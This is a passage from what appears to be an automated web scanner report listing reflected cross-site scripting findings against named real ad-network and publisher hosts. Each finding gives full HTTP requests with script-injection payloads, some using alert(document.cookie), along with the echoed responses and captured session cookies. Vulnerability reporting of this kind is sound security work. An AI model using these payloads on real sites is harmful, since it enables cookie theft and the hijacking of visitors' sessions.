The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91045%3balert(1)//4c6e467d525 was submitted in the jscallback parameter. This input was echoed as 91045;alert(1)//4c6e467d525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback091045%3balert(1)//4c6e467d525 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:51:03 GMT
Age: 0
Connection: keep-alive
Content-Length: 17207

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback091045;alert(1)//4c6e467d525({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.45. http://isp-planet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfdeb"-alert(1)-"613a5e49d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback0&cfdeb"-alert(1)-"613a5e49d69=1 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:51:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 17188

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
pleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.isp-planet.com/","cfdeb"-alert(1)-"613a5e49d69":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}
...[SNIP]...

3.46. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4d0ed--><script>alert(1)</script>7894299f6b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?4d0ed--><script>alert(1)</script>7894299f6b8=1 HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.1298033251

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:29 GMT
Content-Type: text/html
Content-Length: 46040

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?4d0ed--><script>alert(1)</script>7894299f6b8=1 -->
...[SNIP]...

3.47. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 553d9<script>alert(1)</script>e9cc914bffe was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe&tr=ISPPLANET&num=4&layt=2&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:17 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:17 GMT
Content-Type: application/x-javascript
Content-Length: 94

// Error: Unknown old section INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe

3.48. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b94a<script>alert(1)</script>27ebc1b8b3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET&num=4&layt=2&fmt=simp&6b94a<script>alert(1)</script>27ebc1b8b3d=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:38 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:38 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 6b94a<script>alert(1)</script>27ebc1b8b3d

3.49. http://jlinks.industrybrains.com/jsct [tr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4ab45<script>alert(1)</script>d0043b82960 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET4ab45<script>alert(1)</script>d0043b82960&num=4&layt=2&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:19 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:19 GMT
Content-Type: application/x-javascript
Content-Length: 84

// Error: Site 829 has no section ISPPLANET4ab45<script>alert(1)</script>d0043b82960

3.50. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 81194<script>alert(1)</script>27c159b7bd0 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K0878481194<script>alert(1)</script>27c159b7bd0 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://member.internet.com/index.php?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=772110218044714989
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d80b89b&0&&4d5a0212&383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d80b8c5&0&&4d5b746e&383df689f9c2c8ede3ba30f48f38e86; udm_0=MLvv9SUJKSpnph6paFnfVkA0rk1LefEuZz1z1LEsX/Bn9dRrr3caS5Nx+fYJSIW4iuuU7N6Uw2pXbGXpa69nRENbK/evRwRNI5S5VA0jvxc9TcILsqoEK11t9KZFBwEulYudXbr+iZm/eYBrb+PUSP2YAvwqfkTMMUZhdtDKhWgcV1D+U5c9Q9qdnwrfgsG2/QKxzpEtsVKDWTwOP/LUfCXRlVwzbcoFHckxFYuVuDN6aNGK/W5Vu5z2MZN9siois1hkvMp1NZmI1gq6XziIUrtKYezfU2eSd/Nxp8LXy6kqiny+txbR7oNILstLsVL3h805m9IjYpEEhmL3vzcEscbr3YZot9f9UK13KC7bX9jEtuEBNiFuRKPHEZBJp5GG3ktOGfLCfrWksr3WDOT5EvbYnKmh2szV4mXf9MZhD2CoDw+WJdDn/0XQm1byDqdVOgu/cOoPfRq7zqnnxAsU2h1MFZLG/vtW5eQCQGnjs0ALFtTkH04viQnm/KbFC3+iLwGoywcnXP6wsWzmuEwzSs6gGH2sz5ZWRZaUzCUVlYqNbwi3YhnkVMiGf2X61kbm5KwJEDiTs+ux2nxhXJZ5UIGRjE+/+XfRm9L0UDr7WXq4rGhfNob357RDVm6+I25hZeuGKFMe3kMuACzObiQDKMbFYMDli7GGaTt+jSX4sESdjOp5dkcrFprcF18pv+k6CUJq0F5hejKVhxCdj5Ls+oDhN51Vv9Zm6PoVLbH/AScPnoyU7iD9u6tW++3DT6vsPnL9/eIk9tbBBoo+ibw1nPIxS52JFqTZgLAKBBis+LDC+V62Gn1V/v92qZwAqggdKf2BVZVivi9qy5StWOcDl9kF1zn7Z1lQd81dOGcmlO91dREZZhbhmYiGuPbwsS8mOxMP9+SP17ftK7xYpCLNLXh9UTT6qo+1fS+oTdLZxfDR1M/lSs6924+o9/ByDNOzTcNjdKSZUPr75X2qBZJFQWBgopoKiqVbyBeob9mA3e6NDAes6j9PIoKEqEBV4gizjlQDoGhxtF5+szmWn4Cq0bqPz+FlxwSSQlyahAWrsrUiim355W8X8pVt4DfD6A==; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d80b99b&0&&4d59f17b&383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=pUPFOkPF7gMUFq3RgKwyVM+rackiy9FAEQLAqVwoHKDQKQUECTMJ3YH2aKvvUGIZ/k87dlTGDd9rmrYAbh0Ooo1h8N1EtRckRO8D+6zUXBYqtZsYeI3a3nZ/uKCMZlVcBQPHjipQg6Z/Y6xdJbQfIXEXDcuu0jXA0r4EqwZxAebO/H1rbq/oefPid9Abgjtgf1CcStKYcH9pekrGHDTaE0zblx/AXw==; rtc_0=MLsvrF8vcT5jJgGklT7AEDDwQw1KnSMm7aAOGlFl0Rl+KJT2a8F6YiRtSKwh7tchB2APQUwkRaHEYKxI6Ou1zujy8BRV5QH9T2a+M2zGjUX0Viz2yYzyqS+abJbtcJY1AwbkBwWSbrmXeIU8L72BbNEwFLUWnw4D3Y7Z6rQDk61zUtWFZ7FpYbBUhrPYiq8tMbpbnAwfLRKaokvXBfAxTtnkTG6wRnCUf8KvJJldcrEDXlft7E4UKO6JuUKNlWhu56+PoRacb0owT1rR7sedFEbW8MsH3Q==; rsi_us_1000000=pUMd5U+jOAQYbgln1lzSSFtZh+R6jR5rAnxq6o31aLucdIr+/fYe947NQq3oGGNC0Zybw/uBTme9mliOjVrpvW9lNHoIJpyFxXrnW0F9cX836eAs9iauj4qWIcHgL3TFQSA4Z73lqhE12hj3VtzYwKn5RuNOFP7LRbUwPz4hvnepGfgDfqaKm6X2n0jBEr09e5eqjeE4DMGp/EXx11RFPaTHKkydfd12P49fxntHNTIyRRsEHjsEcW0ZNZMQJflrWq6sAf7DgbAWDI3/Jnx+vyTQAJlhAu4mIiNyegI9axT1BuxdhS+919q1H97DZQ3w62bgBkDIYrXY5yQWXZWVejD6/z3ngANs7+FrE223fMrJvxQDoMoY1AHtEmGHWyShN0dYElwJGSqzSkDlCTGkUMGVzLubq3yr8f69CswpcrgOupv2uUWyPGDrXz+H/CH+yTqQRrJs/WX8eWf2B5whRHTQ5MyF5Fexs389R2H/mNLQT4EWR4ogCuCGbXwQqpvdz+F4b9AoViXg4/+yAwREakp5va0FEOKEK1iXnQHPS2qPxJ+QMdnr2WCWzNXFn/6T/1lv6ngf2MDVh/CQUC7RH8fki+WkYGAydtv98aqip51nFCv3HRw03+CFBgpQxvEefja90cfrQCaR3e7eLvOWMWKWKvIlhGlHENQ5cppXhDh7xw+XQtmSizFU+vYcBqwOxwBjqxLxnOzf2WnohHRaJJitjwAQKwt7VJuwGA/CMXXLCzDN7r67fBQq5flzHl6Z12s19p7KB/l8Yr0OhoFjqp6t+u/24QjbXs/toP7ywsjgCrEHD3CQS+bQOwR2zaiqlNFilQ2L/jmAeI6vhjCO1yca/zEJ5su8D6hT7YidV0X4waY/bVBJJ8e5ZwjbBWMv883XIC9h36CnTnbB5pwKO1P5OIvjtDRPNxxYR1HbpyQb7/mAwTKXbuSocx3ex6uAG5M=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 18 Feb 2011 12:47:17 GMT
Cache-Control: max-age=86400, private
Expires: Sat, 19 Feb 2011 12:47:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:47:16 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K0878481194<SCRIPT>ALERT(1)</SCRIPT>27C159B7BD0" was not recognized.
*/

3.51. http://kona5.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36dc8"%3balert(1)//cbe5ca11ae0 was submitted in the l parameter. This input was echoed as 36dc8";alert(1)//cbe5ca11ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D136dc8"%3balert(1)//cbe5ca11ae0&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1532

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=14102&layout=adlinks&sId=&cb=1298042585&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(1);
reJsonRes
...[SNIP]...

konaRequestId="41737853890776178";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=136dc8";alert(1)//cbe5ca11ae0&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.52. http://kona5.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a3b"-alert(1)-"30b7d04b7a was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0d2a3b"-alert(1)-"30b7d04b7a&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1515

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=14102&layout=adlinks&sId=&cb=1298042588&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(1);
reJsonRes
...[SNIP]...
SearchInfo(47,"http://search.internet.com/query.php?IC_QueryText=#WORD#&IC_QueryDatabase=www.palmboulevard.com");
}, "reaction response");
konaSafe(function(){
konaTweakMode=167854338;
konaRequestId="0d2a3b"-alert(1)-"30b7d04b7a";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1&dc_aff_id=");
onKonaReturn(1);
}
...[SNIP]...

3.53. http://member.internet.com/cookie_class.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /cookie_class.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca4a"><script>alert(1)</script>3bbcce52da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4ca4a"><script>alert(1)</script>3bbcce52da1?v=df32f76fa6fa8754bd6541fbadfecfe211e5e258bcf020cb52e7a9e01ff3686a0edfe7667c06596631975dce2bb7dde8d8d152e9f519c68a2e56c43d18985ca6 HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="tinfo" value="/4ca4a"><script>alert(1)</script>3bbcce52da1">
...[SNIP]...

3.54. http://member.internet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2143c"><script>alert(1)</script>236f6fe04f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2143c"><script>alert(1)</script>236f6fe04f8 HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; __utmz=175186238.1298033268.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; __utma=175186238.1586971603.1298033268.1298033268.1298033268.1; __utmc=175186238; __utmb=175186238.3.10.1298033268; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=221%3D12715%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:50:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="tinfo" value="/favicon.ico2143c"><script>alert(1)</script>236f6fe04f8">
...[SNIP]...

3.55. http://pdastreet.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b734%3balert(1)//79a8a9bd1be was submitted in the jscallback parameter. This input was echoed as 5b734;alert(1)//79a8a9bd1be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218152309&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26010&mh=0f813f309d5cacd41f37cc296f7d04b3&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=c94d0e979f8311611a6d3feb87776715&pvu=B5833CD53518442CBC5E30D5B26FA9D2&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C363%3B674%2C813%3B475%2C1101%3B555%2C1208%3B517%2C1423%3B332%2C2148%3B&prf=ll%3A165%7Cintl%3A1453%7Cpreprochrome%3A1%7Cgetconchrome%3A81%7Ccontint%3A9875%7Ccontl%3A11414%7Cadvint%3A1390%7Cadvl%3A12804%7Ctl%3A12904&jscallback=$iTXT.js.callback95b734%3balert(1)//79a8a9bd1be HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
